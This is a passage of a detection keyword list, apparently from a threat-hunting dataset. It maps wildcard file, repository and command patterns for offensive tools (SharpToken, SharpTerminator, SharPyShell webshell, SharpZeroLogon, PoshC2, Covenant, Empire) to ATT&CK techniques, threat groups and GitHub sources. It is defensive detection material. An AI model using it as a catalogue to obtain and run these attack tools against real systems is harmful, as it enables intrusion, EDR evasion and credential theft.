-*SharpSword.exe*,offensive_tool_keyword,cobaltstrike,Read the contents of DOCX files using Cobalt Strike's Execute-Assembly,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/OG-Sadpanda/SharpSword,1,1,N/A,10,10,110,13,2023-08-22T20:16:28Z,2021-07-15T14:50:05Z -*SharpSword.exe*,offensive_tool_keyword,SharpSword,Read the contents of MS Word Documents using Cobalt Strike's Execute-Assembly,T1562.004 - T1059.001 - T1021.003,TA0005 - TA0002,N/A,N/A,C2,https://github.com/OG-Sadpanda/SharpSword,1,1,N/A,8,10,110,13,2023-08-22T20:16:28Z,2021-07-15T14:50:05Z -*SharpSword.sln*,offensive_tool_keyword,SharpSword,Read the contents of MS Word Documents using Cobalt Strike's Execute-Assembly,T1562.004 - T1059.001 - T1021.003,TA0005 - TA0002,N/A,N/A,C2,https://github.com/OG-Sadpanda/SharpSword,1,1,N/A,8,10,110,13,2023-08-22T20:16:28Z,2021-07-15T14:50:05Z -*SharpSword-main.*,offensive_tool_keyword,SharpSword,Read the contents of MS Word Documents using Cobalt Strike's Execute-Assembly,T1562.004 - T1059.001 - T1021.003,TA0005 - TA0002,N/A,N/A,C2,https://github.com/OG-Sadpanda/SharpSword,1,1,N/A,8,10,110,13,2023-08-22T20:16:28Z,2021-07-15T14:50:05Z -*SharpSystemTriggers.git*,offensive_tool_keyword,SharpSystemTriggers,Collection of remote authentication triggers in C#,T1078 - T1059.001 - T1550,TA0002 - TA0005 - TA0040,N/A,N/A,Lateral Movement - Privilege Escalation,https://github.com/cube0x0/SharpSystemTriggers,1,1,N/A,10,4,366,43,2023-08-19T22:45:20Z,2021-09-12T18:18:15Z -*SharpSystemTriggers.sln*,offensive_tool_keyword,SharpSystemTriggers,Collection of remote authentication triggers in C#,T1078 - T1059.001 - T1550,TA0002 - TA0005 - TA0040,N/A,N/A,Lateral Movement - Privilege Escalation,https://github.com/cube0x0/SharpSystemTriggers,1,1,N/A,10,4,366,43,2023-08-19T22:45:20Z,2021-09-12T18:18:15Z -*SharpSystemTriggers-main*,offensive_tool_keyword,SharpSystemTriggers,Collection of remote authentication triggers in C#,T1078 - T1059.001 - T1550,TA0002 - TA0005 - TA0040,N/A,N/A,Lateral Movement - Privilege Escalation,https://github.com/cube0x0/SharpSystemTriggers,1,1,N/A,10,4,366,43,2023-08-19T22:45:20Z,2021-09-12T18:18:15Z -*SharpTask.exe*,offensive_tool_keyword,sharpcollection,Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.,T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,Exploitation tools,https://github.com/Flangvik/SharpCollection,1,1,N/A,N/A,10,1885,285,2023-09-23T03:34:27Z,2020-06-05T12:50:00Z -*sharptelnet *,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*SharpTemplateResources/cmd/*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1099,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*SharpTerminator.exe*,offensive_tool_keyword,SharpTerminator,Terminate AV/EDR Processes using kernel driver,T1055.003 - T1547.001 - T1053.005 - T1091 - T1014 - T1053.006 - T1053.004 - T1112 - T1112.001,TA0007 - TA0008 - TA0006 - TA0002,N/A,N/A,Exploitation tools,https://github.com/mertdas/SharpTerminator,1,1,N/A,N/A,3,266,53,2023-06-12T00:38:54Z,2023-06-11T06:35:51Z -*SharpTerminator.git*,offensive_tool_keyword,SharpTerminator,Terminate AV/EDR Processes using kernel driver,T1055.003 - T1547.001 - T1053.005 - T1091 - T1014 - T1053.006 - T1053.004 - T1112 - T1112.001,TA0007 - TA0008 - TA0006 - TA0002,N/A,N/A,Exploitation tools,https://github.com/mertdas/SharpTerminator,1,1,N/A,N/A,3,266,53,2023-06-12T00:38:54Z,2023-06-11T06:35:51Z -*SharpTerminator.sln*,offensive_tool_keyword,SharpTerminator,Terminate AV/EDR Processes using kernel driver,T1055.003 - T1547.001 - T1053.005 - T1091 - T1014 - T1053.006 - T1053.004 - T1112 - T1112.001,TA0007 - TA0008 - TA0006 - TA0002,N/A,N/A,Exploitation tools,https://github.com/mertdas/SharpTerminator,1,1,N/A,N/A,3,266,53,2023-06-12T00:38:54Z,2023-06-11T06:35:51Z -*SharpTerminator-main.zip*,offensive_tool_keyword,SharpTerminator,Terminate AV/EDR Processes using kernel driver,T1055.003 - T1547.001 - T1053.005 - T1091 - T1014 - T1053.006 - T1053.004 - T1112 - T1112.001,TA0007 - TA0008 - TA0006 - TA0002,N/A,N/A,Exploitation tools,https://github.com/mertdas/SharpTerminator,1,1,N/A,N/A,3,266,53,2023-06-12T00:38:54Z,2023-06-11T06:35:51Z -*SharpToken* add_user*,offensive_tool_keyword,SharpToken,SharpToken is a tool for exploiting Token leaks. It can find leaked Tokens from all processes in the system and use them,T1134 - T1101 - T1214 - T1087 - T1038,TA0004 - TA0007,N/A,N/A,Exploitation tools,https://github.com/BeichenDream/SharpToken,1,0,N/A,N/A,4,353,47,2023-04-11T13:29:23Z,2022-06-30T07:34:57Z -*SharpToken* delete_user*,offensive_tool_keyword,SharpToken,SharpToken is a tool for exploiting Token leaks. It can find leaked Tokens from all processes in the system and use them,T1134 - T1101 - T1214 - T1087 - T1038,TA0004 - TA0007,N/A,N/A,Exploitation tools,https://github.com/BeichenDream/SharpToken,1,0,N/A,N/A,4,353,47,2023-04-11T13:29:23Z,2022-06-30T07:34:57Z -*SharpToken* enableUser *,offensive_tool_keyword,SharpToken,SharpToken is a tool for exploiting Token leaks. It can find leaked Tokens from all processes in the system and use them,T1134 - T1101 - T1214 - T1087 - T1038,TA0004 - TA0007,N/A,N/A,Exploitation tools,https://github.com/BeichenDream/SharpToken,1,0,N/A,N/A,4,353,47,2023-04-11T13:29:23Z,2022-06-30T07:34:57Z -*SharpToken* list_token*,offensive_tool_keyword,SharpToken,SharpToken is a tool for exploiting Token leaks. It can find leaked Tokens from all processes in the system and use them,T1134 - T1101 - T1214 - T1087 - T1038,TA0004 - TA0007,N/A,N/A,Exploitation tools,https://github.com/BeichenDream/SharpToken,1,0,N/A,N/A,4,353,47,2023-04-11T13:29:23Z,2022-06-30T07:34:57Z -*SharpToken* tscon *,offensive_tool_keyword,SharpToken,SharpToken is a tool for exploiting Token leaks. It can find leaked Tokens from all processes in the system and use them,T1134 - T1101 - T1214 - T1087 - T1038,TA0004 - TA0007,N/A,N/A,Exploitation tools,https://github.com/BeichenDream/SharpToken,1,0,N/A,N/A,4,353,47,2023-04-11T13:29:23Z,2022-06-30T07:34:57Z -*SharpToken.csproj*,offensive_tool_keyword,SharpToken,SharpToken is a tool for exploiting Token leaks. It can find leaked Tokens from all processes in the system and use them,T1134 - T1101 - T1214 - T1087 - T1038,TA0004 - TA0007,N/A,N/A,Exploitation tools,https://github.com/BeichenDream/SharpToken,1,1,N/A,N/A,4,353,47,2023-04-11T13:29:23Z,2022-06-30T07:34:57Z -*SharpToken.exe*,offensive_tool_keyword,godpotato,GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.,T1055.012 - T1053.005 - T1047,TA0005 - TA0002 - TA0008,N/A,N/A,Privilege Escalation,https://github.com/BeichenDream/GodPotato,1,1,N/A,N/A,10,1186,179,2023-06-25T05:20:26Z,2022-12-23T14:37:00Z -*SharpToken.exe*,offensive_tool_keyword,SharpToken,SharpToken is a tool for exploiting Token leaks. It can find leaked Tokens from all processes in the system and use them,T1134 - T1101 - T1214 - T1087 - T1038,TA0004 - TA0007,N/A,N/A,Exploitation tools,https://github.com/BeichenDream/SharpToken,1,1,N/A,N/A,4,353,47,2023-04-11T13:29:23Z,2022-06-30T07:34:57Z -*SharpToken.git*,offensive_tool_keyword,SharpToken,SharpToken is a tool for exploiting Token leaks. It can find leaked Tokens from all processes in the system and use them,T1134 - T1101 - T1214 - T1087 - T1038,TA0004 - TA0007,N/A,N/A,Exploitation tools,https://github.com/BeichenDream/SharpToken,1,1,N/A,N/A,4,353,47,2023-04-11T13:29:23Z,2022-06-30T07:34:57Z -*SharpToken-main.zip*,offensive_tool_keyword,SharpToken,SharpToken is a tool for exploiting Token leaks. It can find leaked Tokens from all processes in the system and use them,T1134 - T1101 - T1214 - T1087 - T1038,TA0004 - TA0007,N/A,N/A,Exploitation tools,https://github.com/BeichenDream/SharpToken,1,1,N/A,N/A,4,353,47,2023-04-11T13:29:23Z,2022-06-30T07:34:57Z -*SharpUnhooker.*,offensive_tool_keyword,SharpUnhooker,C# Based Universal API Unhooker,T1055.012 - T1070.004 - T1562.001,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/GetRektBoy724/SharpUnhooker,1,1,N/A,9,4,365,103,2022-02-18T13:11:11Z,2021-05-17T01:33:38Z -*SharpUnhooker-main*,offensive_tool_keyword,SharpUnhooker,C# Based Universal API Unhooker,T1055.012 - T1070.004 - T1562.001,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/GetRektBoy724/SharpUnhooker,1,1,N/A,9,4,365,103,2022-02-18T13:11:11Z,2021-05-17T01:33:38Z -*SharpUp audit*,offensive_tool_keyword,covenant,Covenant commands - Covenant is a collaborative .NET C2 framework for red teamers,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/cobbr/Covenant,1,0,N/A,10,10,3787,732,2023-02-21T23:55:48Z,2019-02-07T15:55:18Z -*SharpUp*,offensive_tool_keyword,SharpUp,SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.,T1057 - T1086 - T1059 - T1068,TA0002 - TA0003 - TA0008,N/A,N/A,Exploitation tools,https://github.com/GhostPack/SharpUp,1,1,N/A,N/A,10,1021,222,2022-08-21T22:26:04Z,2018-07-24T17:39:33Z -*SharpUp.exe*,offensive_tool_keyword,sharpcollection,Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.,T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,Exploitation tools,https://github.com/Flangvik/SharpCollection,1,1,N/A,N/A,10,1885,285,2023-09-23T03:34:27Z,2020-06-05T12:50:00Z -*SharpUpManager*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*SharpUpMenu(*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,0,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*SharpView.exe*,offensive_tool_keyword,sharpcollection,Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.,T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,Exploitation tools,https://github.com/Flangvik/SharpCollection,1,1,N/A,N/A,10,1885,285,2023-09-23T03:34:27Z,2020-06-05T12:50:00Z -*SharpView.exe*,offensive_tool_keyword,SharpView,C# implementation of harmj0y's PowerView,T1018 - T1482 - T1087.002 - T1069.002,TA0007 - TA0003 - TA0001,N/A,N/A,Discovery,https://github.com/tevora-threat/SharpView/,1,1,N/A,10,9,850,206,2021-12-17T15:53:20Z,2018-07-24T21:15:04Z -*SharpView\SharpView*,offensive_tool_keyword,SharpView,C# implementation of harmj0y's PowerView,T1018 - T1482 - T1087.002 - T1069.002,TA0007 - TA0003 - TA0001,N/A,N/A,Discovery,https://github.com/tevora-threat/SharpView/,1,0,N/A,10,9,850,206,2021-12-17T15:53:20Z,2018-07-24T21:15:04Z -*SharpView-master*,offensive_tool_keyword,SharpView,C# implementation of harmj0y's PowerView,T1018 - T1482 - T1087.002 - T1069.002,TA0007 - TA0003 - TA0001,N/A,N/A,Discovery,https://github.com/tevora-threat/SharpView/,1,1,N/A,10,9,850,206,2021-12-17T15:53:20Z,2018-07-24T21:15:04Z -*sharpweb all*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*SharpWebManager.cs*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*SharpWebServer.exe*,offensive_tool_keyword,sharpcollection,Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.,T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,Exploitation tools,https://github.com/Flangvik/SharpCollection,1,1,N/A,N/A,10,1885,285,2023-09-23T03:34:27Z,2020-06-05T12:50:00Z -*SharpWifiGrabber.exe*,offensive_tool_keyword,sharpcollection,Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.,T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,Exploitation tools,https://github.com/Flangvik/SharpCollection,1,1,N/A,N/A,10,1885,285,2023-09-23T03:34:27Z,2020-06-05T12:50:00Z -*sharpwmi action=*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*SharpWMI.exe*,offensive_tool_keyword,sharpcollection,Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.,T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,Exploitation tools,https://github.com/Flangvik/SharpCollection,1,1,N/A,N/A,10,1885,285,2023-09-23T03:34:27Z,2020-06-05T12:50:00Z -*SharpWMI.Program*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,0,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*SharpWmiManager*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*sharpwmi-N*.exe*,offensive_tool_keyword,viperc2,vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/FunnyWolf/vipermsf,1,1,N/A,N/A,1,78,37,2023-09-28T08:36:47Z,2021-01-20T13:08:24Z -*sharpwsus locate*,offensive_tool_keyword,SharpWSUS,SharpWSUS is a CSharp tool for lateral movement through WSUS,T1047 - T1021.002 - T1021.003 - T1077 - T1069 - T1057 - T1105 - T1028 - T1070.004 - T1053 - T1086 - T1106 - T1059,TA0002 - TA0003 - TA0008,N/A,N/A,Network Exploitation tools,https://github.com/nettitude/SharpWSUS,1,0,N/A,N/A,5,408,63,2022-11-20T23:41:40Z,2022-05-04T08:27:57Z -*SharpWSUS*,offensive_tool_keyword,SharpWSUS,SharpWSUS is a CSharp tool for lateral movement through WSUS,T1047 - T1021.002 - T1021.003 - T1077 - T1069 - T1057 - T1105 - T1028 - T1070.004 - T1053 - T1086 - T1106 - T1059,TA0002 - TA0003 - TA0008,N/A,N/A,Network Exploitation tools,https://github.com/nettitude/SharpWSUS,1,0,N/A,N/A,5,408,63,2022-11-20T23:41:40Z,2022-05-04T08:27:57Z -*SharpWSUS.*,offensive_tool_keyword,SharpWSUS,SharpWSUS is a CSharp tool for lateral movement through WSUS,T1047 - T1021.002 - T1021.003 - T1077 - T1069 - T1057 - T1105 - T1028 - T1070.004 - T1053 - T1086 - T1106 - T1059,TA0002 - TA0003 - TA0008,N/A,N/A,Network Exploitation tools,https://github.com/nettitude/SharpWSUS,1,1,N/A,N/A,5,408,63,2022-11-20T23:41:40Z,2022-05-04T08:27:57Z -*SharPyShell*,offensive_tool_keyword,SharPyShell,SharPyShell is a tiny and obfuscated ASP.NET webshell that executes commands received by an encrypted channel compiling them in memory at runtime.,T1505 - T1027 - T1059 - T1117,TA0002 - TA0003 - TA0008,N/A,N/A,POST Exploitation tools,https://github.com/antonioCoco/SharPyShell,1,1,N/A,N/A,9,809,144,2023-09-27T08:48:31Z,2019-03-10T22:09:40Z -*sharpyshell.aspx*,offensive_tool_keyword,SharPyShell,SharPyShell - tiny and obfuscated ASP.NET webshell for C# web,T1100 - T1059 - T1505,TA0002 - TA0003 - TA0004,N/A,N/A,Web Attacks,https://github.com/antonioCoco/SharPyShell,1,1,N/A,N/A,9,809,144,2023-09-27T08:48:31Z,2019-03-10T22:09:40Z -*SharPyShell.py*,offensive_tool_keyword,SharPyShell,SharPyShell - tiny and obfuscated ASP.NET webshell for C# web,T1100 - T1059 - T1505,TA0002 - TA0003 - TA0004,N/A,N/A,Web Attacks,https://github.com/antonioCoco/SharPyShell,1,1,N/A,N/A,9,809,144,2023-09-27T08:48:31Z,2019-03-10T22:09:40Z -*SharpZeroLogon*,offensive_tool_keyword,cobaltstrike,Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/nccgroup/nccfsas,1,1,N/A,10,10,594,117,2022-08-05T16:25:42Z,2020-06-25T09:33:45Z -*SharpZeroLogon.exe*,offensive_tool_keyword,sharpcollection,Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.,T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,Exploitation tools,https://github.com/Flangvik/SharpCollection,1,1,N/A,N/A,10,1885,285,2023-09-23T03:34:27Z,2020-06-05T12:50:00Z -*SharpZippo.exe*,offensive_tool_keyword,cobaltstrike,List/Read contents of Zip files (in memory and without extraction) using CobaltStrike's Execute-Assembly,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/OG-Sadpanda/SharpZippo,1,1,N/A,10,10,55,10,2022-05-24T15:57:33Z,2022-05-24T15:52:31Z -*ShawnDEvans/smbmap*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,1,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*ShawnDEvans/smbmap*,offensive_tool_keyword,smbmap,SMBMap allows users to enumerate samba share drives across an entire domain. List share drives. drive permissions. share contents. upload/download functionality. file name auto-download pattern matching. and even execute remote commands. This tool was designed with pen testing in mind. and is intended to simplify searching for potentially sensitive data across large networks.,T1210.001 - T1083 - T1213 - T1021,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Information 